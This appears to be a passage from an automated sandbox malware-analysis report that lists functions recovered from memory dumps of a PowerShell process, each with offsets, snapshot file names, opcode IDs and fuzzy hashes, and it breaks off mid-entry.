                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04987740 Relevance: .2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1be335828da2ec532cbc1719a24e8dcfea1a2db34a473b0a10db5f5143decd7b
                                                          • Instruction ID: 47ea83a1a5f8c18ca398e6cfcda0cab711b330fda91916380dc393d7c10678a3
                                                          • Opcode Fuzzy Hash: 1be335828da2ec532cbc1719a24e8dcfea1a2db34a473b0a10db5f5143decd7b
                                                          • Instruction Fuzzy Hash: A251BE347042099FE714EBA9DC84A6ABBEAEBC9214B2545BDE509CB351EB31EC01C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498BAD0 Relevance: .2, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d548ed09dae02cf88fcdbd84a0f12da83a1465f18c4697d3fe844bf8848944e
                                                          • Instruction ID: 0937d15b60b603356bf816a5fe7f440e8be84580108b22e33c35cb7c76213924
                                                          • Opcode Fuzzy Hash: 5d548ed09dae02cf88fcdbd84a0f12da83a1465f18c4697d3fe844bf8848944e
                                                          • Instruction Fuzzy Hash: D0611571E00208DFDB14DFA9D584B9DBBF6EF98310F18816AE819AB354EB34AC45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498BAC2 Relevance: .2, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 82915888e9afb94217a5837492db84a1d0072ed783f73b73a0d8e23bd6266a61
                                                          • Instruction ID: 8c4ff3166ae6a7113951089027649a678550041e2f682fce8b84f0bf308b3a38
                                                          • Opcode Fuzzy Hash: 82915888e9afb94217a5837492db84a1d0072ed783f73b73a0d8e23bd6266a61
                                                          • Instruction Fuzzy Hash: 9F512775E00248DFCB14DFA9D584B9DBBF6EF98310F18806AE819AB365DB34AC45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498E421 Relevance: .1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bff93938ca823a79021c2bf0f390d22aac75ce32dc20ce998c25167812dc3ada
                                                          • Instruction ID: f5e21bb7f09060dec27e6b19fc00e1018e73c819b40a1dfe5de325f8756ef712
                                                          • Opcode Fuzzy Hash: bff93938ca823a79021c2bf0f390d22aac75ce32dc20ce998c25167812dc3ada
                                                          • Instruction Fuzzy Hash: 69414934B003058FDB20EF7CD594A6ABBE6EF8821571585A9E509CF362EB34ED028B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498E430 Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88e5c433b040d6eb646de5e2e0d8a9e2a55a9369f362d4d4a7a85f3d6c34bd3d
                                                          • Instruction ID: 8723fdd20aed41520aa085075f4de10b0ca43be15e60cd04fe66b2bf9d9ea519
                                                          • Opcode Fuzzy Hash: 88e5c433b040d6eb646de5e2e0d8a9e2a55a9369f362d4d4a7a85f3d6c34bd3d
                                                          • Instruction Fuzzy Hash: 8B411B34B003058FDB20EF7CD594E6ABBE6EF8821571585A9E509DF351EB34ED028B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07853CCC Relevance: .1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 31d41f1f1d77a2af5ec3770ca5d72702cf91c829d9f40984c5942ef42ebe8f57
                                                          • Instruction ID: ccfc813aebd31d11a77b22f1c70ff80aba8395370677be17fe2042c04cf63210
                                                          • Opcode Fuzzy Hash: 31d41f1f1d77a2af5ec3770ca5d72702cf91c829d9f40984c5942ef42ebe8f57
                                                          • Instruction Fuzzy Hash: 9C4128F0A00206DFDB258F18C5147BA7BB2AF9528CF0480A9CD04DFA56D735ED44CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498E610 Relevance: .1, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 763c9953973f55c07aaa334c2a99d0169d99347b927a722320a7389b008c8a72
                                                          • Instruction ID: 9c488e2afa823488f12ec4e5b4c7bbfb25d4368d987ac736ea3ecb63745cb949
                                                          • Opcode Fuzzy Hash: 763c9953973f55c07aaa334c2a99d0169d99347b927a722320a7389b008c8a72
                                                          • Instruction Fuzzy Hash: 25418C34A042499FCB11DF78D954A9DBBF2FF89214F1489ADD405EB392CB34AD05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04982B00 Relevance: .1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17e1e858388d8a6f9eeee2293fa825f03268d2469a6c7ff091216fe7eb3c46dd
                                                          • Instruction ID: 4dc239d9c0bf128266ee72d82de302bb96c02ec8cc80b7b9e52756e2de837024
                                                          • Opcode Fuzzy Hash: 17e1e858388d8a6f9eeee2293fa825f03268d2469a6c7ff091216fe7eb3c46dd
                                                          • Instruction Fuzzy Hash: 0F413774A006059FCB19DF58C598ABAF7B1FF88310B1586A9D815AB364C736FC91CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498C398 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8d6423c6df3b0cbad445f142581cf9aef377e41e0d5920a5df09feae54bca63
                                                          • Instruction ID: 8d6ee5f5a607eacd5105c9bc9903a1a6e3100545fd3febeada810cc09cef7f6d
                                                          • Opcode Fuzzy Hash: e8d6423c6df3b0cbad445f142581cf9aef377e41e0d5920a5df09feae54bca63
                                                          • Instruction Fuzzy Hash: EA319E353002048FD715EB78E844B9ABB96EFD4226F00867DE609CF351DF71A84ACBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04986FD1 Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 268c95f7e0beda26b4edcad7834bcc62ddbf55f137326b2c48fe554387f8db9b
                                                          • Instruction ID: f7f890c1d56fed12aa41c95b22c9df795c5843ddedec37f90d34be9d095deb17
                                                          • Opcode Fuzzy Hash: 268c95f7e0beda26b4edcad7834bcc62ddbf55f137326b2c48fe554387f8db9b
                                                          • Instruction Fuzzy Hash: C7311A34B042058FCB14EFA8C958AAABBF5EB8D715F2454ACE445EB395DB31EC01CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498DFC8 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c32e755a1e5bd10cf0af046f32bd98b4897029b53ecfd9cf01e6d0b8ced23fc9
                                                          • Instruction ID: 49e90b77834e04698aa8c795a8eaf5fb3b70bde2064b66b8aca61c951a04f0ff
                                                          • Opcode Fuzzy Hash: c32e755a1e5bd10cf0af046f32bd98b4897029b53ecfd9cf01e6d0b8ced23fc9
                                                          • Instruction Fuzzy Hash: 60315B35A042448FCB15DF68D4646AEBFF2EF8A214F0489A9D442EB392CB35AC85CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498AE70 Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d65beb6e57caae9bac1250f5042c8bc3c072edd0e57ef777f000e2c33799df94
                                                          • Instruction ID: 5397eaf61deba7a83cc97a019d00c4905d0f27f9930fe14e47bd6315df242b21
                                                          • Opcode Fuzzy Hash: d65beb6e57caae9bac1250f5042c8bc3c072edd0e57ef777f000e2c33799df94
                                                          • Instruction Fuzzy Hash: 5A315870E006098FDB19EFADD494BAEBBF6AF88311F14806EE505EB351EB749C418B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498AD38 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cec70e8a4ed9bbc53d489efb7b1ea961faa65bd1751cf6d0bf80886086ddbd9f
                                                          • Instruction ID: 2a094d7f1225d69a345270e3f5f82f447ea645e5a01d3cad20e2f43d20f56c88
                                                          • Opcode Fuzzy Hash: cec70e8a4ed9bbc53d489efb7b1ea961faa65bd1751cf6d0bf80886086ddbd9f
                                                          • Instruction Fuzzy Hash: 273192B8E003489FEB01EB64E854AAE7BF3EF85300F1184A9D615AF395CA749D45CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498AE80 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a4a7d1458af358924623d812044e9aae976b3d851dee16179362d68b109e3e3
                                                          • Instruction ID: 8cb06c0dafa21cfa9ac076dcabafc348e59208f48438563c316c373151bf5969
                                                          • Opcode Fuzzy Hash: 6a4a7d1458af358924623d812044e9aae976b3d851dee16179362d68b109e3e3
                                                          • Instruction Fuzzy Hash: 54314970E006098FDB14EF69D4947AEBBF6AF88210F10802AE505EB351EB749C018B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498E640 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd5e1bd8a389d064923c1acad26c6e1601d36ce037bfa9c8d6192c5af8103e22
                                                          • Instruction ID: 280eb9fb56427d2b802e5d34a91580a62a73494ee2fa3003c9b3db0b4e1f17ca
                                                          • Opcode Fuzzy Hash: bd5e1bd8a389d064923c1acad26c6e1601d36ce037bfa9c8d6192c5af8103e22
                                                          • Instruction Fuzzy Hash: 34316934A00209DFCB24DF79D994A9EBBF2FF89205F108968D416AB394DB34AD05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498AD48 Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 85de18cc9004d6095c212dbfacc127231b0513bae68736c92713d64b8442cde7
                                                          • Instruction ID: 784622d99a28cefbd64a27d32cd2921aa192a3451c5404005b9e39b009a4f244
                                                          • Opcode Fuzzy Hash: 85de18cc9004d6095c212dbfacc127231b0513bae68736c92713d64b8442cde7
                                                          • Instruction Fuzzy Hash: 70314FB8E002089FEB04EB64E554AAE7BF3EF84300F1084699615AB395DA75AD418F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498DFD8 Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47eed014b62b932f57e3fb0dde587f8787c60a0f1b481f62bc81d825bf2399af
                                                          • Instruction ID: 7358922981104a64dbe7b9f87d33ab324d9b4c53cdc0bf8a36ade636ed8121a9
                                                          • Opcode Fuzzy Hash: 47eed014b62b932f57e3fb0dde587f8787c60a0f1b481f62bc81d825bf2399af
                                                          • Instruction Fuzzy Hash: 56314B34A002048FCB14DF68D46869EBBF6EF89314F04896DD406EB390DF75AC85CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0321F3D8 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d7df0b273198cdf26dd1090554019d82913737a370cf677675a20ca7ad83b0a
                                                          • Instruction ID: 67650922673db1eb76999102fd00b4667d497a075ae4d227d74d586bbb08191b
                                                          • Opcode Fuzzy Hash: 4d7df0b273198cdf26dd1090554019d82913737a370cf677675a20ca7ad83b0a
                                                          • Instruction Fuzzy Hash: 8E212975518300EFDB05DF10DBC0B16BBA5FB98314F24C6ADEA090E256C336C4A6DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049893F8 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7490553d24c721fec19a77f1e2cc7d14802e991561218c77458f351f98750662
                                                          • Instruction ID: ac8d73a5109ea8e1660250ad88ae8376d961b6a12e406e35e8631baa6205f31d
                                                          • Opcode Fuzzy Hash: 7490553d24c721fec19a77f1e2cc7d14802e991561218c77458f351f98750662
                                                          • Instruction Fuzzy Hash: B531ACB49057448EDB60DF7ED08879AFFF6EF88320F28C46DD84D9B215D67464818B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0321F02C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 53cf4ec08d821fcfbcbba43c54bcffd318d1287bed70b104fed8c018c0dd2263
                                                          • Instruction ID: 4438032e177af81fcd11bad9c9878db5175492fcdaff96619fa93b84703fd42d
                                                          • Opcode Fuzzy Hash: 53cf4ec08d821fcfbcbba43c54bcffd318d1287bed70b104fed8c018c0dd2263
                                                          • Instruction Fuzzy Hash: 2E213775614300EFDB14DF10DBC0B16BBA5EB94324F24C6ADD81A4B24AC376D496CA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04989408 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83d0d41890ee0cc170fb71188f21318f8ed3b689f0491bdb44badc83855c0b1e
                                                          • Instruction ID: c5b7276fef448560b13f05951f1ac2a25dfc9f1b0f31e64b9a44bdb86889719a
                                                          • Opcode Fuzzy Hash: 83d0d41890ee0cc170fb71188f21318f8ed3b689f0491bdb44badc83855c0b1e
                                                          • Instruction Fuzzy Hash: C7217AB49057448EDB60DF6ED08839AFFF6EB88310F28C42ED85D9B255D77464818B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498767C Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 018d6622816efc89923e79550634a5182d32d49229825eb2257b241cbf6c19b6
                                                          • Instruction ID: d40c56a41b0c8aae2ab9cf0bba732acc1a3af2ce182daf39585b677452dd0ca9
                                                          • Opcode Fuzzy Hash: 018d6622816efc89923e79550634a5182d32d49229825eb2257b241cbf6c19b6
                                                          • Instruction Fuzzy Hash: DE11EF39B001148FDB14EBACE940AED77F6EBCC615B1440A9E509DB315DB31ED128BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0321F3D3 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86abae72bb8b1cff9036b38b87f2b2ab2493ab898db39df918bf320120c6b226
                                                          • Instruction ID: 9d076fd2128966882fdb3165f14bb1e7e9b12648b0e33e7e3b7611ce4f6b2f5b
                                                          • Opcode Fuzzy Hash: 86abae72bb8b1cff9036b38b87f2b2ab2493ab898db39df918bf320120c6b226
                                                          • Instruction Fuzzy Hash: F921AE76504240EFCB06CF10D6C0B15BFB2FB88314F28C6A9D9494A256C33AD466DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04982C5C Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ed1538688a105adca5f678b77b95a6b18e0bc5ca8a18b288828ff1d94c982b7
                                                          • Instruction ID: cc995d2d04b0bb68f7c453467f06226089f7252f15a679ebe2e7207a94a360b9
                                                          • Opcode Fuzzy Hash: 2ed1538688a105adca5f678b77b95a6b18e0bc5ca8a18b288828ff1d94c982b7
                                                          • Instruction Fuzzy Hash: 6711A03590D3905FDB03DF68D8605E9BF71EF8A220B0981D7D4909F2A3C226990AC7A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0321F027 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 020411f76a1def23680c170f620a6ef38196b77a797ef2394590ff05fb243f34
                                                          • Instruction ID: 0b3ecaf14893b6461cdd43045f9b0773010f921515c4c77ea93521b09b73e4a6
                                                          • Opcode Fuzzy Hash: 020411f76a1def23680c170f620a6ef38196b77a797ef2394590ff05fb243f34
                                                          • Instruction Fuzzy Hash: CE119D7A504284DFCB15CF14D6C4B15FFA2FB84324F28C6AED8494B656C33AD49ACB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498BCF0 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69455d4f66cdc785797948d473b97182fc90b428253a04e6c31641120bb0f8ea
                                                          • Instruction ID: 05e418e33174f52f3d90b453283e3111818b75cd66ec458673dbb59460b52749
                                                          • Opcode Fuzzy Hash: 69455d4f66cdc785797948d473b97182fc90b428253a04e6c31641120bb0f8ea
                                                          • Instruction Fuzzy Hash: 5D01D2316087849FD725DB79D994B597FF4EF46220F1888EEE08ECB6A2C620F885C701
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498BF20 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70f6aa33ac62bce8389cc790549f05f1faa8b40e5bb56aa2d39577c65e694654
                                                          • Instruction ID: 9c050df2e3cd496f593ae616a4ae240972536c8e476f90fd86b10bd2d010dce0
                                                          • Opcode Fuzzy Hash: 70f6aa33ac62bce8389cc790549f05f1faa8b40e5bb56aa2d39577c65e694654
                                                          • Instruction Fuzzy Hash: 7901AD2230A3E05FD7119A7A8C44967BFADDF8652070945AFF594CB2A3CA61DD04CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498E108 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ca4b070ddb2a69ed6b9a5d5489b7751112bc21ac5614bcc6c999cce11cab27f
                                                          • Instruction ID: 26386d02283ae7dc794ddd126a8da813da7022152e8408fdd98c3161c7f41770
                                                          • Opcode Fuzzy Hash: 5ca4b070ddb2a69ed6b9a5d5489b7751112bc21ac5614bcc6c999cce11cab27f
                                                          • Instruction Fuzzy Hash: 6C111B35204750CFC728DF79D450896B7F6EF8931532089ADD04A87BA0DB32F849CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498DEA0 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0fbf68cac19dbd3de03dfb09d5df5d4602bca75da9d87fc217b17ff6ab79e6ec
                                                          • Instruction ID: 35234375e975a050a040f7a4efc211f88d3f56d62b370190cd69b0550f3592eb
                                                          • Opcode Fuzzy Hash: 0fbf68cac19dbd3de03dfb09d5df5d4602bca75da9d87fc217b17ff6ab79e6ec
                                                          • Instruction Fuzzy Hash: D6019235B00218DFCB119F74E808AAEBBF5FF89315F1040ADE50AD7242DB319901CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0321D01D Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eeb7e5f82aed3f991930b6e2742ad317f26aa99c4fcfeabe004c0f30378bde78
                                                          • Instruction ID: b61ef90d5ee5f61c7f1818211eb97fa9f59be38ff8f24be23e3bc341375e4cca
                                                          • Opcode Fuzzy Hash: eeb7e5f82aed3f991930b6e2742ad317f26aa99c4fcfeabe004c0f30378bde78
                                                          • Instruction Fuzzy Hash: FC01F231418300EEE7208A25CEC4B77FFD8DF51325F08C06AED480F282C6799886CAB2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0321D007 Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
